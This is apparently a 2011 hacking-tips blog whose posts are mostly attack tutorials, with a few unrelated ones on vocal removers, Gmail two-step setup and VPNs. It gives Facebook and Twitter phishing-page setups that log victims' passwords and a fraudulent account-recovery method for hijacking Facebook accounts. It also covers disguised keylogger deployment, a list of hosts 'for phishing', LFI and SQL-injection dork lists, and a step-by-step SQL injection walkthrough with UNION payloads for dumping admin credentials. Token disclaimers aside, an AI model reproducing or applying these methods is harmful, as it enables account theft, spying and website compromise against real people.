Wednesday 28 September 2011

How to create a facebook Fake Login Page-Fake login sacript


I am providing you both tool html page and php script,Just download both from download link below Before starting the tutorial.




Download From Here
facebook-fake
Note: This Tutorial Is For Educational Purposes Only. I Will Not Be Held Responsibility For, If Any Person Use This For Any Wrong Reason .Use At Your Own Risk. I Do Not Recommend Hacking.
Let’s Start:-

How To Create A Facebook Fake Login Page-Fake Login Script

1.After download extract both file in a folder.This folder contain two files(index1.html,write.php) Your don’t need to change anything in those file,Both files are preconfigured.
2.Register a free Web hosting account on Website like :-
www.110mb.com
www.000webhost.com or any other host.There many free hosting service providers available on web,you just need to find one.
3.Open your ftp host account and upload both file in root directory.
4.If you have done every thing right now access index1.html by using your hosting account url,like http://yoursite.com/index1.html. Its shows you a fake login page just like below:-
Facebook-Fake-Login-Page
5.Now what happens,if a user enter his login id and password in this fake login page it’s automatically redirect user to original Facebook login page,And php file which you have uploaded with html file automatically create a txt file with the name of  passes.txt which contain user name and password of victim.
6. You can test Script yourself by entering some fake login- id password.
See how easy it is to create a fake facebook fake login page.

Facebook Hacking – New Phishing Method

facebook
First of all you need to download phishing page for hacking facebook accounts.Given below is the download link for FB phishing page.
download
Upload the files on any free hosts,If you are facing any problem in uploading files, upload a PHP shell on your server,then upload the zipped file you downloaded and give this command in command execution form : Unzip Fb.zip and hit Enter.You are done!!
hacking
Now the next part is giving the Link to give the victim,Here we are going to adopt a new techinique.Lets look what we are going to do now.
When someone clicks a Link on Facebook, it goes with a redirection.
Example: http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.google.com%2F&h=d2a55
(When you put google.com in your chat box or wherever & click the Link,it goes like above.)
Replace google.com with your phishing page link.That’s it.You can mask your phishing page link by shortnening url.But if you go for free domains and url shortners like .co .cc, .co .nr., tk ,goo . gl , bit . ly it wont work because all these were blacklisted by facebook.Use http://www.subdomain.com, its not blacklisted yet.After doing all this redirect your phishing page to some pictures or something the victim is interested in.Wishing you all the best.
Enjoy FB Hacking!!

How to hack any facebook account easily by Reverting/Reseting pass of your victim NO keyloging pishing required

Here is one more interesting tip on how to hack a Facebook account by the method of reverting the password.This method does not involve any skill or anything just a brain would be enough to get you through this trick ! Well,you might think that it is impossible but it is actually true that you can hack any facebook account ! So before we start i would like to tell you what "Reverting" actually means...





What is Reverting ?

Reverting is the process of resetting a password without the knowledge of the actual user ! So this is basically a low level of hacking but it does the job for you !

For more on reverting go here : What exactly is reverting ?

How do I hack my friend's Facebook ?

Make sure your not logged in to your account.If you are then make sure you sign out and then follow the following methods

1.Go to this link:



That is the form that you will be using in order to hack your user.

2.Then in "Your E-mail Address" type your E-mail address.

3.Then apply the following options as in the image below.





4.Once you have done that,You will have a question asking "Email associated with the compromised account." - In that just type "No" and nothing else other than that !

5.In "Your contact email address." - Type your own email for you to receive the Password Reset Link.

6.In the "Full Name of the Account." - Type the Name of your victim if you know.If you don't then:

a.Try finding the Name of the victim by just searching his/her e-mail on Facebook.
b.If that doesn't work then google the E-mail address of your Victim,that might give you some details.
c.If that also doesn't work then use the following sites to get them





So if you follow one of the above methods you should be getting the Full Name of your victim.Now lets move on to the next step

7."Date Of Birth" - In this column you have to enter the Birthday of your Victim.If you know him personally then you should be knowing it.If not you can just social engineer him and somehow make him tell it.Once you get it you have to enter it in that.

8."URL (web address) of your compromised profile." - This is just the profile URL of your Victim which can be got easily(Usually of the form: http://www.facebook.com/profile.php?id=99999)

9.Now your all set ! Before you submit the form just make sure you recheck the whole form if you have done the right thing.Once you do so just click on "Submit"

10.Thats it ! You have done it ! Now you just have to wait for Facebook team to look up for your request ! Once they approve it they will send a link to reset your victim's Password !

Top 4 Free Vocal Removers: Eliminate Vocals From Your Favorite Songs

Have you ever listened to a song and wished that you could remove the vocals? The art of eliminating the human voice from music tracks is notoriously difficult to do - but it can be done. It isn’t always possible to totally remove voice from a song because of varying factors, such as compression, stereo image separation, frequency spectrum, etc. However, with some experimentation, good quality audio, and a little bit of luck, you can achieve satisfactory results.

1. Winamp Plugin: AnalogX Vocal Remover

If you use the Winamp software media player for playing your music collection, then AnalogX Vocal Remover can be installed in your plugins folder to remove vocals. Once installed, simply go to Options > Preferences > DSP/effect to choose the plugin. The interface is very easy to use as there’s just a slider bar to control the amount of audio processing.
 

2. Wavosaur

As well as being a good audio editor, Wavosaur can also be used to remove vocals from songs. Once you have imported your audio file into Wavosaur, you can use the Voice Remover tool to automatically process the file. As with all voice removal software, the results you get will depend on various factors such as the type of music, how compressed it is, and the quality of the audio source.

3. Audacity VST Plugin: Center Pan Remover

Center Pan Remover (download) is a Nyquist plugin for the very popular Audacity audio editor. This plugin works best on audio files where the vocals are near to the center of the stereo field. Center Pan Remover automates the process of splitting the stereo image and track inversion. Simply copy the plugin into the Audacity plugins folder to see the option in Audacity’s effects menu.

4. Karaoke Anything

Karaoke Anything is an audio player that does a decent job of removing vocals from music tracks. It can be used for MP3 files or entire audio CDs. The interface is user-friendly and you can use a slider bar to control the amount of audio processing. Unfortunately Karaoke Anything isn’t capable of saving what you hear. However, if you want a basic audio player for MP3 files and audio CDs that can remove vocals, then Karaoke Anything is a good tool to keep in your digital audio toolbox.
 

How to Secure your Gmail Account from Hackers

All of us have our Email Accounts on GmailYahooHotmail etc.Phising and hacking are on the rise and many of us have already faced the situtaions when our email Id has been compromised.It is very difficult to estimate the loss which one undergoes once his email ID has been hacked.
Now you can add an extra layer of security in your Gmail Account.After enabling this feature you have to enter an addtional verification code (sent to your mobile) to login into your account.So,if somebody hacked your password even then he won’t be able to access your email account.
How to Secure Gmail Account:-

  • Choose a verification method.By selecting Text message (SMS) or voice call you will recieve the verification code on you phone either as text message or as a call.
61 How to Secure your Gmail Account from Hackers
  • Enter the appropriate information about your country and Mobile Number.
126 How to Secure your Gmail Account from Hackers
  • Choose SMS text message or Voice call option according to your need. (I prefer SMS text message).
  • After giving your mobile number test your phone by clicking on the Send Code button.
133 How to Secure your Gmail Account from Hackers
  • Now you will receive a verification code on your given mobile number and type that code in the verification field and click on Verify button.
  • After verifying your number click on the Next button.
If you lost your mobile or your number is not available when you need it. For this you can save backup codes in to your computer.
  • Click on Next button again.
  • Here you will see 10 Backup verification codes. Choose Print codes or Save to text file option whatever you like but keep it safe and don’t lose it.
  • Check mark the box and click on Next button.
16 How to Secure your Gmail Account from Hackers
  • Here give your working alternative number. And click on Next button.
  • Now again click on the Next button again and then click on the Turn on 2-step verification button.
5 How to Secure your Gmail Account from Hackers
  • Click OK.
That’s it ! Now you have been added 2-step verification security to your Gmail account. Now whenever you will enter your password it will ask you to enter verification code without it you won’t be able to login to your Gmail Account.

Download torrent files directly using IDM/DAP OR ANY DOWNLOAD MANAGER

go to http://torrific.com

register

copy the torrent url

and enjoy downloading with higher speed using a download manager :)

How to hack facebook, twitter, Gmail password using Winspy Keylogger

Keylogger is also onr of the best ways to hack password of facebook, gmail or any other website account. In this post i am going to show how to hack passwords using winspy keylogger.
Read the steps givn below:


1. First of all get your Winspy keylogger. Download it from the link given below

Download Here

2. After downloading, run the program and create the user id and pasword. Remember this password as it is required each time you start Winspy and even while uninstalling.
3. Then a new dialog box will open to show you the hotkey (Ctrl + Shift + F12 ) to start keylogger.
4. Now press the hot key written in last step to go to the login form and enter login details to login.
5. Now you are on main screen of the software. CLink on remote at top and then remote install.

> user – type in the slave’s name
> file name – Name the file to be sent. Use the name such that slave will love to accept it.
> file icon – keep it the same
> picture – select the picture you want to apply to the keylogger.

[Image: settingsforwinspykeylogger.jpg]

In the textfield of “Email keylog to” , enter your email address.
6.click on “Create Remote file”.


You just need to send ths file to the person whom you want to hack. If slave runs this on his system, you will get all his keylogs in your email. Check for passwords in keylogs..

Tuesday 27 September 2011

A Large List of Free PHP Hosting for Phishing

* 110mb - http://110mb.com/
* Ripway - http://ripway.com/
* SuperFreeHost - http://superfreehost.info/
* Freehostia - http://freehostia.com/
* Funpic - http://funpic.de/
* Freeweb7 - http://freeweb7.com/
* t35 - http://t35.com/
* Awardspace - http://awardspace.com/
* PHPNet - http://phpnet.us/
* Free Web Hosting Pro - http://freewebhostingpro.com/
* ProHosts - http://prohosts.org/
* AtSpace - http://prohosts.org/
* ByetHost - http://byethost.com/
* 000webhost - http://000webhost.com/
* My3GB - http://www.my3gb.com/
* Oxyhost - http://www.oxyhost.com/
* Rack111 - http://www.rack111.com/
* Ocostwebhost - http://0costwebhost.com/
* FreeZoka - http://www.freezoka.com/

LFI dork LIST

inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=


inurl:/include/new-visitor.inc.php?lvc_include_dir=


inurl:/_functions.php?prefix=


inurl:/cpcommerce/_functions.php?prefix=


inurl:/modules/coppermine/themes/default/theme.php?THEME_DIR=


inurl:/modules/agendax/addevent.inc.php?agendax_path=


inurl:/ashnews.php?pathtoashnews=


inurl:/eblog/blog.inc.php?xoopsConfig[xoops_url]=


inurl:/pm/lib.inc.php?pm_path=


inurl:/b2-tools/gm-2-b2.php?b2inc=


inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=


inurl:/modules/agendax/addevent.inc.php?agendax_path=


inurl:/includes/include_once.php?include_file=


inurl:/e107/e107_handlers/secure_img_render.php?p=


inurl:/shoutbox/expanded.php?conf=


inurl:/main.php?x=


inurl:/myPHPCalendar/admin.php?cal_dir=


inurl:/index.php/main.php?x=


inurl:/index.php?include=


inurl:/index.php?x=


inurl:/index.php?open=


inurl:/index.php?visualizar=


inurl:/template.php?pagina=


inurl:/index.php?pagina=


inurl:/index.php?inc=


inurl:/includes/include_onde.php?include_file=


inurl:/index.php?page=


inurl:/index.php?pg=


inurl:/index.php?show=


inurl:/index.php?cat=


inurl:/index.php?file=


inurl:/db.php?path_local=


inurl:/index.php?site=


inurl:/htmltonuke.php?filnavn=


inurl:/livehelp/inc/pipe.php?HCL_path=


inurl:/hcl/inc/pipe.php?HCL_path=


inurl:/inc/pipe.php?HCL_path=


inurl:/support/faq/inc/pipe.php?HCL_path=


inurl:/help/faq/inc/pipe.php?HCL_path=


inurl:/helpcenter/inc/pipe.php?HCL_path=


inurl:/live-support/inc/pipe.php?HCL_path=


inurl:/gnu3/index.php?doc=


inurl:/gnu/index.php?doc=


inurl:/phpgwapi/setup/tables_update.inc.php?appdir=


inurl:/forum/install.php?phpbb_root_dir=


inurl:/includes/calendar.php?phpc_root_path=


inurl:/includes/setup.php?phpc_root_path=


inurl:/inc/authform.inc.php?path_pre=


inurl:/include/authform.inc.php?path_pre=


inurl:index.php?nic=


inurl:index.php?sec=


inurl:index.php?content=


inurl:index.php?link=


inurl:index.php?filename=


inurl:index.php?dir=


inurl:index.php?document=


inurl:index.php?view=

Making Twitter Phishing Site Tutorial

Hack Twitter Tutorial.

Yah! Today is turn of Twitter. I am going to show you how to make the Twitter Phishing site, with which you can Hack any Twitter account ;)

Step 1: The First Step in Making the site is to register an account at http://www.t35.com/(if you have account than you can skip first 2 steps)



Step 2: Now Goto your email account that you gave and confirm your account with confirmation link.

Step 3: Now Goto www.t35.com/login/ and Log into your account.

Step 4: Now Download this File http://www.mediafire.com/?3xeta6t3d1n8n48

Step 5: Now when you are logged into your account click on the Upload button.


Step 6: Now click on choose file under "Archives (zip, tar, tgz, gz)" section.



Step 7: Browse the twitter.zip file from folder where you have downloaded it.


Step 7: Now click on the tick button (as shown below) and your files would be uploaded.

Step 8: Now any one who visits your site would be taken to the Fake Twitter Login Page. After they enter their Username and Password, they will be taken to real Yahoo Login page and they will not get the slightest idea that their Account is Hacked.


And dont use this for illegal purposes.



NOTE::: To access the input data ( Usernames and Passord ) Goto the Following Address:




http://www.yoursitesadress.t35.com/lol.txt


If I am not clear in any point Please ask me in comments below.
THE DOWNLOAD LINK TO twitter.zip is http://www.mediafire.com/?3xeta6t3d1n8n48

How to Hack Websites using SQL Injection? A DETAILED TUTORIAL.

SQL Injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks. (wikipedia definition)



What will I need to perform an SQL Injection attack?


[+] exploit scanner
[+] a good list of "google dorks"
[+] admin finder (Use Havij)
[+] half a brain and the will to learn lol Tongue

NOW DOWNLOAD the EXPLOIT SCANNER FROM:

THE LIST OF GOOGLE DORKS ARE HERE:


Ok after you are done downloading the tools. Open the .rar located on your desktop. Now open the
this list you can pick any dork you feel like scanning with. For good search results search for a dork like this.
Code:
index.php?id=



After you have chose a dork like above, copy it into your clipboard for further use. Now open your exploit scanner.exe. (scanner made by reiluke). At the top where it says "Dork" your going to want to paste your dork into the box.



Atfer you have done this your going to want to switch your "Max Url" from 100 to 1000 for alot of search results. Then press scan on your exploit scanner. After it is done scanning your going to press "Test Sites". After all this is done you should have two lists.




After it is done testing all scanned sites. These pre-tested sites might be sqli vulnerable. But you must first check each site individually. To test a individual site add a " ' " after the url. For example.
Code:
sqlivulnerablesite.com/index.php?id=1'



*NOTE* With this exploit scanner it auto-quotes all the urls.


Lets say for instance you found a site that might be vulnerable (or what you think maybe a vulnerable site). If a error on the web page comes up something like this.
Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1



Then its vulnerable to sql injection. The first step to this multi-step systematic attack on the sql databases is to found out the number of columns there is in the sql database. To found this out we use this code injection in the address bar after the website url. Like this.
Code:
sqlivulnerablesite.com/index.php?id=1 order by 1--



Load the page. If the page loads correctly with that code injection in the url then we are on the right track 


Knowing that there is already 1 column in this database we do another code injection. Like this.
Code:
sqlivulnerablesite.com/index.php?id=1 order by 2--



If the page loads correctly again then this attack can still be performed.


Usually if the pages loads correctly after trying the #2 then I try stepping the number up to around 10. 

*NOTE* If you load the web page on a code injection like this.
Code:
sqlivulnerablesite.com/index.php?id=1 order by 10--



and you get a result like this.
Code:
Unknown column '10' in 'order clause'



Then you must go down a number until you reach the number of columns that is in the database where it allows the web page to load correctly without any errors on the web page. For instance since the error on the web page said "unknown column '10'" we must go down to the number 9. Like this.
Code:
sqlivulnerablesite.com/index.php?id=1 order by 9--



If your page loads correctly then this means there is 9 columns in the database 


The next step in this attack is to find out what column is vulnerable to our attack. We use this code injection in your address bar after the vulnerable site. Like this.
Code:
sqlivulnerablesite.com/index.php?id=1 union all select 1,2,3,4,5,6,7,8,9--



After you have loaded the page it should show which columns are vulnerable. Usually shows about 2-3 columns. I personally use the the lowest number that is vulnerable. For instance "2". Lets say the vulnerable column in the database is "2". The next code injection we use is to found out the version of the database. Like This.
Code:
sqlivulnerablesite.com/index.php?id=1 union all select 1,@@version,3,4,5,6,7,8,9



When the web page is loaded, where the number "2" was on the web page there should be in place of it the "database version". It is best if you a beginner to make sure the database version is 5.0 on higher like 5.0.17. Anything below 5.0 you are going to be required to brute force each of the tables for information. So now that we have the database version which is "5.0.17", we must now find the table names with this code injection at the top in your address bar.
Code:
sqlivulnerablesite.com/index.php?id=1 union all select 1,table_name,3,4,5,6,7,8,9 from information_schema.tables--



After the page is loaded it should have all the table names on the web page. The table name that your going to want to find is admins. Once you have found admins or something that is similar to that, then we do another code injection to found out that columns which are in that table with this code.

Code:
sqlivulnerablesite.com/index.php?id=1 union all select 1,column_name,3,4,5,6,7,8,9 from information_schema.columns where table_name=char(x)--



*NOTE* Here (x) is the ascii value of the table name.


Now we must find the ascii value of the word admins. 


The ascii value of admins is
Code:
& #97 ; & #100 ; & #109 ; & #105 ; & #110; & #115 ;



Delete all the ";" , "#" , and "&". So it should look like this.
Code:
97,100,109,105,110,115



Now replace the the "x" with that ascii number code. Now your new code injection should look something like this. Enter it in your url address bar.
Code:
sqlivulnerablesite.com/index.php?id=1 union all select 1,column_name,3,4,5,6,7,8,9 from information_schema.columns where table_name=char(97,100,109,105,110,115)--



When the page loads you should get something like/similar to username and password on the web page. To get the data from that column you must use a code injection like this.
Code:
sqlivulnerablesite.com/index.php?id=1 union all select 1,concat(username),0x3a,(password),3,4,5,6,7,8,9 from --



*NOTE* (0x3a) is the ascii value of the column name


When the page loads it should show the data of the username and password for cpanel access.

Now to access the cpanel we must find the login page. I provided a admin finder.exe in the .rar. Open it up and type in the url of your vulnerable site. From there it scan till it finds the login page for admin cpanel access. Which can lead to defacement and web server compromise. 

Hopefully someone found this thread useful/helpful. I take full credit in writing this tutorial out. PM me if you need any further help with your sql injections!

Google Dorks For SQL Injetion


The following is a list of Google Dorks for SQLi Injection:
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:lay_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:ageid=
inurl:games.php?id=
inurl:age.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:roduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:gl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:pinions.php?id=
inurl:spr.php?id=
inurl:ages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:articipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:rod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:erson.php?id=
inurl:roductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:rofile_view.php?id=
inurl:category.php?id=
inurl:ublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:rod_info.php?id=
inurl:shop.php?do=part&id=
inurl:roductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:roduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:roduit.php?id=
inurl:op.php?id=
inurl:shopping.php?id=
inurl:roductdetail.php?id=
inurl:ost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:age.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:roduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:read.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:pinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:ffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id

A Huge List of VPN Downloads & Proxy Servers

What is a VPN?
VPN stands for virtual private network. A VPN keeps your wireless communications safe by creating a secure "tunnel," though which your encrypted data travels. These tunnels cannot be entered by data that is not properly encrypted. Not only is data encrypted when you use a VPN, but the originating and receiving network addresses are also encrypted. This adds an extra layer of security.

What is a proxy?
Proxy sites enable you to bypass your own Internet provider and browse through the proxy web site. All that you have to do is type the web site address you would like to visit in the form they provide, and start browsing. Once you keep browsing using that form, you are protected and your real IP address is not being logged.

VPN downloads!

1) UltraVPN
UltraVPN is a free VPN that hides your connection from unwanted ears and allows you to use blocked application. Traffic is quota is unlimited. Bandwidth is up to 500Ko/s depending on network conditions.

[Image: UltraVPN_1.png]

Click here to download UltraVPN!
Click here to use UltraVPN with Linux!

2) Loki VPN
Loki Network allows you to surf the Internet anonymously and hides your real location (IP address). Everything you do through the Loki Network is done from the name of the Loki Network server and from its IP address. Connection between your computer and Loki Network is secured with SSL.

However, to protect your anonymity you still have to be careful about any data you fill in Web forms and network applications you use locally (any locally running application still have the complete access to your real IP address).

[Image: 1152311F9-0.png]

Click here to download Loki VPN!

3) Tor
An anonymous Internet communication system, Tor is a toolset for a wide range of organizations and people that want to improve their safety and security on the Internet. Using Tor can help you anonymize Web browsing and publishing, instant messaging, IRC, and SSH. Tor also provides a platform on which software developers can build new applications with built-in anonymity, safety, and privacy features.

[Image: 2dkl2fl.jpg]

Click here to download Tor!

4) Cyberghost VPN
The Internet has long since become an interactive means of communication. Everyone writes e-mails, and many are making use of online storage sites, blogging, or sharing their views on Web forums. Fortunately, CyberGhost VPN gives users a way to surf anonymously and keep their private information from the eyes of others. CyberGhost VPN provides you with anonymous IP address and encrypts transmissions between you and the Web.

[Image: scr-simontools-cyberghost-vpn.jpg]

Click here to download CyberGhost VPN!

5) JAP
JAP Anon Proxy provides the functionality to surf the web without being observed. This means that neither the requested server nor any observer on the Internet can know which user has viewed which web page - in short, anonymity.

[Image: JonDoScreenshot_en01.png]

Click here to download JAP!

6) FreeProxy
FreeProxy enables many users to share an Internet connection. The basic features include proxying HTTP, SMTP, POP, FTP Proxy, TCP Tunneling, and SOCKS 4/4a/5. The application works well with a wide range of clients including browsers, ICQ, and MSN messenger and comprehensive help illustrates the setup of these clients. In addition, FreeProxy includes authentication to both an internal user database or to a windows domain, extensive reporting, comprehensive control of resource permissions, URL filtering, IP address filtering, local port binding, demand dialing, calendar control, proxy chaining, and includes a functional Web server, plus numerous other features.

[Image: freeproxy_scr.png]

Click here to download FreeProxy!

7) AnalogX Proxy
AnalogX Proxy supports FTP (file transfer), HTTP (web), HTTPS (secure web), NNTP (newsgroups), POP3 (recieve mail), SMTP (send mail) and Socks4/4a and partial Socks5 (no UDP) protocols! It works great with Internet Explorer, Netscape, Instant Messenger.

[Image: Proxy_1.png]

Click here to download AnalogX Proxy!

8) Hotspot Shield
Hotspot Shield is a freeware which ensures anonymous and censor-free internet usage. With Hotspot Shield you can even access blocked websites. For example: Skype is blocked in certain parts of the world. With Hotspot Shield, anyone can access Skype (and any other site they choose). The free software ensures censor-free internet usage by encrypting all communications to and from your computer to protect you from online spying. While advertising supported, HotSpot Shield is is not an invasive adware or pervasive spyware application.

[Image: hotspot-shield-connected1.png]

Click here to download Hotspot Shield!

9) TheGreenBow VPN Client
TheGreenBow VPN Client is a standard-based IPSec VPN Client, compliant with most of the popular VPN gateways allowing fast integration in existing networks. Highly efficient and extremely easy to configure, it provides the remote users an IPSec VPN Client to securely connect to the corporate network. It also allows peer-to-peer VPN with full IPSec standards, full IKE NAT Traversal, IP address emulation, strong encryption (X509, AES, MD5, DES, DH group 1 to 5), Strong authentication (Certificates, X-Auth, Pre-shared key, USB token), redundant gateway and DPD detection, high performances, no system overhead, DNS and WINS resolutions supported, operates as a Service, allowing the use on unattended Servers, accepts incoming IPsec Tunnels, optional 'IPsec only' traffic filtering. Wireless connectivity (GPRS, WiFi, Bluetooth).

[Image: TheGreenBow-IPSec-VPN-Client_3.png]

Click here to download TheGreenBow VPN Client!
*Download link untested, please scan any crack/keygen before use

10) ProxyWay
ProxyWay is free proxy tool that provides easy way to scan proxy lists, check proxy, filter and change proxy servers on fly. You can use ProxyWay with browsers and different applications to visit different sites, download movies, files, send messages, etc.
To simlify ProxyWay configuration you can use 'ProxyWay Auto Configuration' option. Using this option you don't need to download proxy lists, check proxies, create services and configure browser settings manually. ProxyWay will do it for you. The only one thing you should do is start surfing.

ProxyWay main features:
● Easy setup - Proxy Way 'Auto Configuration' option automatically updates proxy list, checks proxies, creates services and configures your browser
● Hide Your Real IP
● Proxy Finder
● Proxy Checker
● Proxy Management System - creates proxy chains and easily changes them on fly
● Supports web proxies

[Image: proxy_list.gif]

Click here to download ProxyWay!

11) InterWAP
Free SSH and VPN FULL SPEED UNLIMITED tunnel anonymizer. Bypass provider restrictions and surf anonymous. Use any services, games and applications even if your provider blocks the access. The speed is not affected.

[Image: 8233c765622b0a0f8beb404d7e968c09b247_1PrintScreen2.JPG]

Click here to download InterWAP!

12) Free VPN
Free VPN protects your entire web surfing session; securing your connection at both your home Internet network & Public Internet networks (both wired and wireless). Free VPN protects your identity by ensuring that all web transactions (shopping, filling out forms, downloads) are secured through HTTPS. Free VPN also makes you private online making your identity invisible to third party websites and ISP’s. Unless you choose to sign into a certain site, you will be anonymous for your entire web session with FreeVPN. We love the web because of the Freedom that it creates to explore, organize, and communicate. Free VPN enables access to all information online, providing freedom to access all web content freely and securely. Secure your entire web session and ensure your privacy online; your passwords, credit card numbers, and all of your data is secured with Free VPN.

[Image: usa-uk-and-canada-vpn-client.jpg]

Click here to download Free VPN!

13) Barracuda Proxy
BdProxy - SOCKS, HTTP, and HTTPS Proxy Server. The BdProxy acts as a SOCKS, HTTP, and HTTPS proxy server. The proxy allows you to use your Internet applications anonymously, despite firewalls. The BdProxy is a free and complementary BarracudaDrive product. The BdProxy client connects and establishs a secure tunnel to the HTTPS Tunnel server integrated into the BarracudaDrive Web Server. This product requires the BarracudaDrive server.

[Image: BdProxy.png]

Click here to download Barracuda Proxy!

14) ProxyMaster
ProxyMaster is an Internet utility to let you browse the Web anonymously by hiding your IP address.
When you surf the Internet your unique identification number (IP number) can be detected by any Website you visit.
ProxyMaster lets you use another IP number which is provided by a server called anonymous proxy server as a unique.

- Hide your IP number from people.
- Check the availability of multiple anonymous proxy servers with a blazing fast speed.
- Import any list of anonymous proxy servers into Winnow Anonymous Proxy
- Export the list of anonymous proxy servers contained in Winnow Anonymous Proxy to text file
- ProxyMaster automatically deletes dead anonymous proxy servers.



Click here to download ProxyMaster!

Proxy Sites
Use these for quick access to websites your workplace/college/school has blocked.

Hack Mobile Phone using Bluetooth

Yes guys it is the mobile bluetooth hacker. It is a software which can be used to hack any mobile phone through bluetooth network. Once connected to a another phone via bluetooth you can do the following:

1) Call from his phone. It includes all call functions like hold etc.
2) Read his messages
3) Read his contacts
4) Change profile

5) Play his ring tone even if phone is on silent
6) Play his songs(in his phone)
7) Restart the phone
 Switch off the phone
9) Restore factory settings
10) Change ringing volume

Notes:

1.) When connecting devices use a code 0000
2.) At start of programming on smartphones do not forget to turn on bluetooth before start of the application
What else you want
Just go and download it


NOTE : password for the file is = www.dl4all.com

 
Tricks and Tips